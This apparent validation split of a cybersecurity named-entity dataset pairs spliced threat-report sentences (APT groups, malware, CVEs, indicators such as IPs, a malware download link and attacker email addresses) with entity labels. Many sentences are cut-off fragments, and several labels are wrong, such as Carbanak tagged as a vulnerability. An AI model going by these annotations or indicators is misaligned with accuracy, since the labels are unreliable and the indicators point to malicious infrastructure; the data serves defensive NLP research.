{"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus . Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even . McAfee researchers will present their findings at this year 's RSA security conference in San Francisco .", "spans": {"Organization: McAfee researchers": [[570, 588]], "Organization: RSA security conference": [[633, 656]]}, "info": {"id": "cyberner_stix_valid_000910", "source": "cyberner_stix_valid"}}
{"text": "Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"Organization: Kaspersky Lab": [[186, 199]], "Organization: Microsoft Office": [[223, 239]], "Vulnerability: exploits": [[240, 248]], "Indicator: Exploit.MSWord.CVE-2010-333": [[296, 323]], "Indicator: Exploit.Win32.CVE-2012-0158": [[326, 353]]}, "info": {"id": "cyberner_stix_valid_000911", "source": "cyberner_stix_valid"}}
{"text": "However , due to the absence of certification centers verifying the digital signatures of Android programs , nothing prevents criminals from adding their own signature . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia . 100 Root Thu 24 Oct 2019 12:08:27 PM UTC Initial shellcode . 101 Plugins Thu 24 Oct 2019 12:07:02 PM UTC Provides API for the other modules ; loads modules . 102 Config Thu 24 Oct 2019 12:07:09 PM UTC Handles encrypted configuration string pool . 103 Install Thu 24 Oct 2019 12:07:46 PM UTC Achieves persistence . 104 Online Thu 24 Oct 2019 12:07:17 PM UTC Overall communications with the C&C server . 106 ImpUser Thu 24 Oct 2019 12:07:24 PM UTC User impersonation via token duplication . 200 TCP Thu 24 Oct 2019 12:01:01 PM UTC TCP communications . 202 HTTPS Thu 24 Oct 2019 12:01:15 PM UTC HTTPS communications . 207 Pipe Thu 24 Oct 2019 12:01:35 PM UTC Handles named pipes . 300 Disk Thu 24 Oct 2019 12:02:29 PM UTC File system operations . 301 Process Thu 24 Oct 2019 12:02:36 PM UTC Process handling . 302 Servcie Thu 24 Oct 2019 12:02:45 PM UTC Service handling . 303 Register Thu 24 Oct 2019 12:02:52 PM UTC Registry operations . 304 Shell Thu 24 Oct 2019 12:03:00 PM UTC Command line operations . 306 Keylogger Thu 24 Oct 2019 12:03:16 PM UTC Keylogging to file system . 307 Screen Thu 24 Oct 2019 12:03:25 PM UTC Screenshot capture . 317 RecentFiles Thu 24 Oct 2019 12:04:44 PM UTC Lists recently accessed files . Since early 2022 , KillNet has claimed on multiple occasions to be partnering or coordinating with several criminal elements , including multiple occasions in which it claimed to be working with the widely known ransomware group REvil .", "spans": {"Organization: TAA": [[185, 188]], "Organization: telecoms operator": [[219, 236]], "Indicator: Handles encrypted configuration string pool": [[458, 501]]}, "info": {"id": "cyberner_stix_valid_000912", "source": "cyberner_stix_valid"}}
{"text": "This group has been conducting attacks for at least four years using a backdoor Trojan that has been under active development . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"Malware: DYEPACK": [[143, 150]], "Organization: bank personnel": [[248, 262]]}, "info": {"id": "cyberner_stix_valid_000913", "source": "cyberner_stix_valid"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"Vulnerability: Carbanak": [[20, 28]], "Organization: financial industry": [[145, 163]], "Indicator: BalkanDoor": [[232, 242]], "Vulnerability: exploit": [[391, 398]], "Vulnerability: CVE-2018-20250": [[428, 442]]}, "info": {"id": "cyberner_stix_valid_000914", "source": "cyberner_stix_valid"}}
{"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": {"Organization: Google": [[18, 24]], "Organization: government officials": [[119, 139]], "Malware: malicious Microsoft Word document": [[181, 214]], "Vulnerability: CVE-2012-0158": [[234, 247]], "Malware: Volgmer": [[366, 373]], "Malware: custom tools": [[432, 444]]}, "info": {"id": "cyberner_stix_valid_000915", "source": "cyberner_stix_valid"}}
{"text": "This leads us to believe that Zen is just part of a larger infection chain . They then moved on to the motor industry in late May . APT17 . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": {"Malware: Zen": [[30, 33]], "Organization: motor industry": [[103, 117]], "System: a remote controller device": [[162, 188]], "System: the Lodz city tram system": [[207, 232]]}, "info": {"id": "cyberner_stix_valid_000916", "source": "cyberner_stix_valid"}}
{"text": "Record surroundings using the built-in microphone in 3gp format . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) . JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a . The attackers ' aim is to put the organisation in an unbearable position by stopping it from functioning , and then demanding a ransom that can stretch to millions of dollars .", "spans": {"Organization: Symantec": [[179, 187]], "Malware: JhoneRAT": [[213, 221]], "Indicator: https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a": [[224, 304]]}, "info": {"id": "cyberner_stix_valid_000917", "source": "cyberner_stix_valid"}}
{"text": "Among the most popular modern defense mechanisms against APTs are air-gaps — isolated network segments without Internet access , where sensitive data is stored .", "spans": {}, "info": {"id": "cyberner_stix_valid_000918", "source": "cyberner_stix_valid"}}
{"text": "However , samples don ’ t have key capabilities to infect innocent apps on victim devices yet . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective . Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands . • New , unexpected compiled ASPX files in the directory • Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": {"System: Exchange Servers": [[821, 837]]}, "info": {"id": "cyberner_stix_valid_000919", "source": "cyberner_stix_valid"}}
{"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": {"Vulnerability: NSA exploits": [[86, 98]], "Organization: antivirus companies": [[225, 244]]}, "info": {"id": "cyberner_stix_valid_000920", "source": "cyberner_stix_valid"}}
{"text": "Cannon opens the email with the correct subject and saves the attachment named auddevc.txt .", "spans": {"Malware: Cannon": [[0, 6]], "Indicator: auddevc.txt": [[79, 90]]}, "info": {"id": "cyberner_stix_valid_000921", "source": "cyberner_stix_valid"}}
{"text": "Its functionality includes uploading and downloading files , and it has configurable network protocols .", "spans": {}, "info": {"id": "cyberner_stix_valid_000922", "source": "cyberner_stix_valid"}}
{"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": {"Malware: Triada": [[69, 75]], "Vulnerability: CVE-2019-1132": [[206, 219]], "Malware: custom PowerShell backdoor": [[381, 407]]}, "info": {"id": "cyberner_stix_valid_000923", "source": "cyberner_stix_valid"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . APT19 is a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": {}, "info": {"id": "cyberner_stix_valid_000924", "source": "cyberner_stix_valid"}}
{"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": {"Organization: CTU": [[284, 287]], "Malware: Hunter web application scanning tool": [[323, 359]]}, "info": {"id": "cyberner_stix_valid_000925", "source": "cyberner_stix_valid"}}
{"text": "Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": {}, "info": {"id": "cyberner_stix_valid_000926", "source": "cyberner_stix_valid"}}
{"text": "Unlike previous samples , this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object .", "spans": {}, "info": {"id": "cyberner_stix_valid_000927", "source": "cyberner_stix_valid"}}
{"text": "Attacks launched by this group were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"Organization: Trend Micro": [[66, 77]], "Organization: anonymous proxy users": [[239, 260]], "Organization: researchers": [[263, 274]], "Organization: journalists": [[277, 288]], "Organization: dissidents": [[295, 305]]}, "info": {"id": "cyberner_stix_valid_000928", "source": "cyberner_stix_valid"}}
{"text": "It is possible that TG-3390 is false-flag operation by a threat group outside of China that is deliberately planting indications of a Chinese origin .", "spans": {}, "info": {"id": "cyberner_stix_valid_000929", "source": "cyberner_stix_valid"}}
{"text": "The core of this functionality is also based on an open-source project that can be found here . RCS Galileo platform . On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": {"Indicator: lilywang823@gmail.com": [[197, 218]], "System: Azure Run Command": [[307, 324]], "System: Azure Admin - on - Behalf - of ( AOBO )": [[329, 368]]}, "info": {"id": "cyberner_stix_valid_000930", "source": "cyberner_stix_valid"}}
{"text": "There ’ s an app for just about any facet of one ’ s personal and professional life , from booking travel and managing projects , to buying groceries and binge-watching the latest Netflix series . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"Organization: Netflix": [[180, 187]], "Organization: Going Global": [[210, 222]], "Malware: Carbanak": [[434, 442]], "Organization: consumer": [[510, 518]], "Malware: Carberp": [[610, 617]]}, "info": {"id": "cyberner_stix_valid_000931", "source": "cyberner_stix_valid"}}
{"text": "” social ” – this command that starts the ‘ AndroidMDMSupport ’ service – this allows the files of any other installed application to be grabbed . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application . Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": {"Organization: Kaspersky": [[157, 166]], "Malware: outlook.live.com”": [[266, 283]]}, "info": {"id": "cyberner_stix_valid_000932", "source": "cyberner_stix_valid"}}
{"text": "OnionDuke ’s development therefore could not have been simply a response to the outing of one of the other Duke malware , but was instead intended for use alongside the other toolsets .", "spans": {"Malware: OnionDuke": [[0, 9]]}, "info": {"id": "cyberner_stix_valid_000933", "source": "cyberner_stix_valid"}}
{"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": {"Malware: NetTraveler": [[138, 149]]}, "info": {"id": "cyberner_stix_valid_000934", "source": "cyberner_stix_valid"}}
{"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": {"Malware: TONEDEAF": [[0, 8]], "Organization: Kaspersky Lab": [[181, 194]]}, "info": {"id": "cyberner_stix_valid_000935", "source": "cyberner_stix_valid"}}
{"text": "In that case , the only help comes from an antivirus solution , for example , Kaspersky Internet Security for Android . But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address , a UNIX timestamp ( probably embedded automatically during the module ’s compilation process ) and a module identifier . DLL sideloading attacks use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious payload .", "spans": {"System: Kaspersky Internet Security": [[78, 105]], "System: Android": [[110, 117]], "Malware: ShadowPad": [[436, 445]], "Malware: backdoor": [[464, 472]], "System: UNIX": [[598, 602]]}, "info": {"id": "cyberner_stix_valid_000936", "source": "cyberner_stix_valid"}}
{"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . The HIGHTIDE backdoor connected directly to 141.108.2.157 . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": {"System: WhatsApp": [[105, 113]], "Malware: HIGHTIDE backdoor": [[352, 369]], "Indicator: 141.108.2.157": [[392, 405]], "Malware: TYPEFRAME": [[415, 424]]}, "info": {"id": "cyberner_stix_valid_000937", "source": "cyberner_stix_valid"}}
{"text": "TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": {}, "info": {"id": "cyberner_stix_valid_000938", "source": "cyberner_stix_valid"}}
{"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years . The exploit was used against one target in the chemical sector in Saudi Arabia . csvde.exe", "spans": {"Malware: Dark Caracal": [[32, 44]], "Organization: banking sector": [[287, 301]], "Organization: finance": [[304, 311]], "Organization: trading companies": [[318, 335]], "Organization: casinos": [[349, 356]]}, "info": {"id": "cyberner_stix_valid_000939", "source": "cyberner_stix_valid"}}
{"text": "Understand firewalls .", "spans": {}, "info": {"id": "cyberner_stix_valid_000940", "source": "cyberner_stix_valid"}}
{"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": {"Organization: 360 Helios Team": [[19, 34]], "Organization: national defense": [[192, 208]], "Organization: government": [[211, 221]], "Organization: science": [[224, 231]], "Organization: technology": [[236, 246]], "Organization: education": [[249, 258]], "Organization: maritime agencies": [[263, 280]], "Malware: SMB": [[329, 332]], "Organization: investment banking": [[335, 353]], "Organization: banks": [[379, 384]], "Organization: IBM 's X-Force": [[481, 495]]}, "info": {"id": "cyberner_stix_valid_000941", "source": "cyberner_stix_valid"}}
{"text": "\" Emboldened by financial and technological independence , their skillsets will advance–putting end users , enterprises , and government agencies at risk . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . APT33 : 5.187.21.70 microsoftupdated.com . This seeming “ streamlining ” of activities by DPRK often makes it difficult for defenders to track , attribute , and thwart malicious activities , while enabling this now collaborative adversary to move stealthily and with greater speed .", "spans": {"Indicator: 5.187.21.70": [[251, 262]], "Indicator: microsoftupdated.com": [[263, 283]]}, "info": {"id": "cyberner_stix_valid_000942", "source": "cyberner_stix_valid"}}
{"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets . The subject is a series of targeted attacks against private companies . Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates . In October 2019 , ESET published “ Operation Ghost ” detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": {"Malware: ViperRAT": [[30, 38]], "Organization: private companies": [[189, 206]], "Malware: PolyglotDuke": [[444, 456]], "Malware: RegDuke": [[459, 466]], "Malware: FatDuke": [[471, 478]]}, "info": {"id": "cyberner_stix_valid_000943", "source": "cyberner_stix_valid"}}
{"text": "] cendata [ . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors . APT16 . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server ’s Unified Messaging service .", "spans": {"Organization: banks": [[29, 34]], "Organization: law firms": [[71, 80]], "System: Microsoft Exchange Server ’s Unified Messaging service": [[229, 283]]}, "info": {"id": "cyberner_stix_valid_000944", "source": "cyberner_stix_valid"}}
{"text": "A business can obtain access to this program only provided they meet requirements set out by Apple . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": {"Organization: Apple": [[93, 98]], "Vulnerability: SMBv1 exploit": [[123, 136]], "Organization: Trend Micro": [[235, 246]]}, "info": {"id": "cyberner_stix_valid_000945", "source": "cyberner_stix_valid"}}
{"text": "The C2 for the aforementioned 9002 sample was logitechwkgame [ . Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"Malware: 9002": [[30, 34]], "Indicator: Vietnam.exe": [[360, 371]], "Organization: diaspora": [[431, 439]]}, "info": {"id": "cyberner_stix_valid_000946", "source": "cyberner_stix_valid"}}
{"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Indicating that this library was probably used in another campaign .", "spans": {"Organization: FireEye": [[208, 215]], "Organization: Chinese government": [[349, 367]]}, "info": {"id": "cyberner_stix_valid_000947", "source": "cyberner_stix_valid"}}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"Malware: malicious documents": [[29, 48]], "Vulnerability: CVE-2017-0199": [[60, 73]], "Indicator: Android version": [[123, 138]]}, "info": {"id": "cyberner_stix_valid_000948", "source": "cyberner_stix_valid"}}
{"text": "Low-volume campaigns distributed Dridex during much of 2015 Moderate volumes of Dridex appeared from the end of 2015 through February 2016 ; it is worth noting that these “ moderate volume ” campaigns were , at the time , the largest campaigns ever observed .", "spans": {"Malware: Dridex": [[33, 39], [80, 86]]}, "info": {"id": "cyberner_stix_valid_000949", "source": "cyberner_stix_valid"}}
{"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": {"Vulnerability: CVE-2013-5065": [[43, 56]], "Vulnerability: EoP exploit": [[57, 68]], "Malware: publicly available tooling": [[145, 171]]}, "info": {"id": "cyberner_stix_valid_000950", "source": "cyberner_stix_valid"}}
{"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ” Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling . Mandiant directly observed one ( 1 ) variant of STRATOFEAR as a Mach - O executable compiled for ARM64 systems that contained a self - signed certificate with a particular Common Name ( CN ) .", "spans": {"Organization: foreign corporations": [[469, 489]], "Organization: foreign governments": [[520, 539]], "Organization: journalists": [[542, 553]], "Organization: dissidents": [[571, 581]], "System: ARM64 systems": [[805, 818]]}, "info": {"id": "cyberner_stix_valid_000952", "source": "cyberner_stix_valid"}}
{"text": "] 230 [ . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease . The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": {"Malware: NoEscape": [[369, 377]]}, "info": {"id": "cyberner_stix_valid_000953", "source": "cyberner_stix_valid"}}
{"text": "Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": {}, "info": {"id": "cyberner_stix_valid_000954", "source": "cyberner_stix_valid"}}
{"text": "To avoid confusion however , we have decided to continue referring to the loader as the “ MiniDuke loader ” .", "spans": {"Malware: MiniDuke": [[90, 98]]}, "info": {"id": "cyberner_stix_valid_000955", "source": "cyberner_stix_valid"}}
{"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers . In the example below , The hackers behind the campaign have been identified as Tortoiseshell , which is believed to work on behalf of the Iranian government .", "spans": {"Organization: Hacking Team": [[71, 83]], "System: Android 5.0 Lollipop": [[130, 150]]}, "info": {"id": "cyberner_stix_valid_000956", "source": "cyberner_stix_valid"}}
{"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": {"Malware: GRIFFON": [[35, 42]], "Malware: Bookworm": [[202, 210]]}, "info": {"id": "cyberner_stix_valid_000957", "source": "cyberner_stix_valid"}}
{"text": "The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": {"Malware: Bookworm": [[150, 158]]}, "info": {"id": "cyberner_stix_valid_000958", "source": "cyberner_stix_valid"}}
{"text": "As security controls have improved , DLL side loading has evolved to load a payload stored in a different directory or from a registry value .", "spans": {}, "info": {"id": "cyberner_stix_valid_000959", "source": "cyberner_stix_valid"}}
{"text": "During our research we also found a component called KPWS that turned out to be another downloader for Slingshot components . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"Organization: embassies": [[171, 180]], "Organization: government entities": [[183, 202]], "Organization: education": [[205, 214]], "Organization: media outlets": [[217, 230]], "Organization: activists": [[247, 256]], "Organization: personnel": [[280, 289]], "Organization: healthcare": [[292, 302]], "Organization: banking": [[307, 314]]}, "info": {"id": "cyberner_stix_valid_000960", "source": "cyberner_stix_valid"}}
{"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device ’ s SDK version to parse them correctly . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": {"Malware: EventBot": [[15, 23]], "Organization: ClearSky": [[146, 154]], "Malware: WinRAR": [[237, 243]]}, "info": {"id": "cyberner_stix_valid_000961", "source": "cyberner_stix_valid"}}
{"text": "The target list and bank specific fake login pages can be dynamically updated via their C2 panel ( dashboard back-end ) which significantly increases the adaptability and scalability of this attack . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools . We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"Malware: ZxShell": [[405, 412], [509, 516]], "Organization: Google Analytics": [[526, 542]], "Organization: CSP": [[561, 564]]}, "info": {"id": "cyberner_stix_valid_000962", "source": "cyberner_stix_valid"}}
{"text": "The web shell files appeared to be installed during the timeframe that BRONZE PRESIDENT was active on the system .", "spans": {}, "info": {"id": "cyberner_stix_valid_000963", "source": "cyberner_stix_valid"}}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": {"Vulnerability: CVE-2012-0158": [[79, 92]], "Malware: Microsoft Word": [[104, 118]], "Vulnerability: Heartbleed vulnerability": [[157, 181]]}, "info": {"id": "cyberner_stix_valid_000964", "source": "cyberner_stix_valid"}}
{"text": "In this particular case , the bot abuses the accessibility service privilege to obtain the package name of the foreground application and determine whether or not to show a phishing overlay window , as shown in the following code snippet : Targets Some examples of phishing overlays are shown below . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": {"Malware: Mimikatz": [[476, 484]], "Malware: gsecdump": [[489, 497]], "Malware: Daserf": [[518, 524]], "Malware: Datper": [[529, 535]]}, "info": {"id": "cyberner_stix_valid_000965", "source": "cyberner_stix_valid"}}
{"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": {"Malware: malware": [[4, 11]], "Malware: swissknife2": [[138, 149]]}, "info": {"id": "cyberner_stix_valid_000966", "source": "cyberner_stix_valid"}}
{"text": "This business unit and the eSurv software and brand was sold from Connexxa S.R.L . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"Organization: eSurv": [[27, 32]], "Organization: Connexxa S.R.L .": [[66, 82]], "Vulnerability: Carbanak": [[112, 120]], "Organization: financial institution": [[151, 172]], "Organization: Palo Alto Networks": [[325, 343]], "Organization: Trend Micro": [[348, 359]]}, "info": {"id": "cyberner_stix_valid_000968", "source": "cyberner_stix_valid"}}
{"text": "Looking under the hood we see the VBA code that builds the PowerShell B-FILE S-TOOL command and launches it but something seemed off .", "spans": {}, "info": {"id": "cyberner_stix_valid_000969", "source": "cyberner_stix_valid"}}
{"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": {"Malware: Android version": [[4, 19]], "Malware: financial Trojan": [[218, 234]]}, "info": {"id": "cyberner_stix_valid_000970", "source": "cyberner_stix_valid"}}
{"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection .", "spans": {"Malware: malware": [[56, 63]], "Malware: PingCastle": [[118, 128]], "Malware: EternalBlue": [[133, 144]], "Indicator: Canhadr/Ndriver": [[199, 214]]}, "info": {"id": "cyberner_stix_valid_000971", "source": "cyberner_stix_valid"}}
{"text": "Sanitize and validate input to ensure that it is properly typed and does not contain escaped code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000972", "source": "cyberner_stix_valid"}}
{"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th . ImportError : Unknown magic number 227 in final2 . Therefore can be no leakage on our part .", "spans": {}, "info": {"id": "cyberner_stix_valid_000973", "source": "cyberner_stix_valid"}}
{"text": "Behind the scenes , there are number of process occurring simultaneously . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": {"Malware: makeself.sh": [[75, 86]], "Malware: shell script": [[98, 110]], "Malware: Winnti": [[210, 216]]}, "info": {"id": "cyberner_stix_valid_000974", "source": "cyberner_stix_valid"}}
{"text": "The Trojan sends an email to sahro.bella7@post.cz with i.ini as the attachment , S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts : Bishtr.cam47 , Lobrek.chizh , Cervot.woprov .", "spans": {"Malware: Trojan": [[4, 10]], "Indicator: sahro.bella7@post.cz": [[29, 49]], "Indicator: i.ini": [[55, 60]], "Indicator: Bishtr.cam47": [[196, 208]], "Indicator: Lobrek.chizh": [[211, 223]], "Indicator: Cervot.woprov": [[226, 239]]}, "info": {"id": "cyberner_stix_valid_000975", "source": "cyberner_stix_valid"}}
